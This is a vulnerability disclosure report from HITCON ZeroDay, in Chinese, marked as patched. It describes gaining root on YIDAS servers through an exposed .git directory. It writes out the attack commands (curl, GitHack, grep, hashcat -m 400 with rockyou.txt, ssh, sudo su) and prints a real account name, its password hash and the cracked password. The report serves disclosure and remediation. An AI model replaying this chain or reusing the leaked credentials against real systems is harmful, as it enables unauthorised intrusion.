YIDAS 資安顧問網站資訊洩漏導致 Root RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2021-00756
  •  發信 Vendor: 宜達資訊
  • Title: YIDAS 資安顧問網站資訊洩漏導致 Root RCE
  • Introduction: 透過 .git 洩漏找到資料庫 Hash,發現為弱密碼且能作為 ssh 登入 root 使用者
  • 獎勵金
  • 感謝函

處理狀態

目前狀態

公開
Last Update : 2021/10/26
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2021/10/13 18:05:14 : 新提交 (由 Steven Meow 更新此狀態)
  • 2021/10/14 13:24:24 : 新提交 (由 Steven Meow 更新此狀態)
  • 2021/10/16 00:36:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/18 12:10:11 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/18 12:10:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/18 12:10:11 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/19 12:26:15 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/19 12:26:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/19 12:26:15 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/22 15:20:12 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2021/10/22 21:27:59 : 確認已修補 (由 Steven Meow 更新此狀態)
  • 2021/10/26 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2021-00756
  • 通報者:stevenyu113228 (Steven Meow)
  • 風險:高
  • 類型:資訊洩漏 (Information Leakage)

參考資料

攻擊者可利用洩漏資訊進行下一步攻擊行為。

OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure

CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

account.yidas.com
forum.yidas.com
stacknews.yidas.com
www.yidas.com
code.yidas.com
nick.yidas.com
taifex-report.yidas.com
dev.yidas.com
nt.yidas.com

敘述

Githack

  • 發現網頁有 .git
    • curl https://code.yidas.com/.git/HEAD
    • 圖片
  • 可以透過 GitHack 還原
    • GitHack.py https://code.yidas.com/.git
    • 圖片

Log 檔案洩漏

  • 觀察到 Git 目錄中有 _backup 資料夾,內部有 sql 的壓縮檔
    • 圖片
  • 解壓縮最新的 backup 檔案
    • gunzip 20170224.sql.gz
  • 透過 grep 取得 Wordpress 密碼 Hash
    • grep user_pass 20170224.sql -C 2
    • 圖片
    • 帳號 : nick_tsai
    • 密碼 Hash : $P$BtE1HLhLBjy9OBJJYF5F6s6FiLjTEq1

破解密碼

  • 透過 hashcat 破解 Wordpress 的 MD5 密碼,使用 rockyou.txt 作為 Wordlist
    • hashcat -m 400 hash.txt rockyou.txt
    • 圖片
    • 取得使用者密碼為 nick1988

使用 SSH 登入

  • ssh [email protected]
    • 圖片

      提升權限

  • 使用 sudo -l 確認使用者權限
    • 圖片
  • 使用 sudo su 取得 root 權限
    • 圖片

      觀察 VHosts

      圖片

  • 發現許多 Doamin 都在這台伺服器上
    • account.yidas.com
    • forum.yidas.com
    • stacknews.yidas.com
    • www.yidas.com
    • code.yidas.com
    • nick.yidas.com
    • taifex-report.yidas.com
    • dev.yidas.com
    • nt.yidas.com
    • two-way-ssl.yidas.com

      觀察主頁

  • 發現該公司有資安顧問、弱掃、滲透等服務
    • 圖片

修補建議

移除網站中的 .git ;勿將 web server 與 ssh 使用相同密碼;使用較強的密碼

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;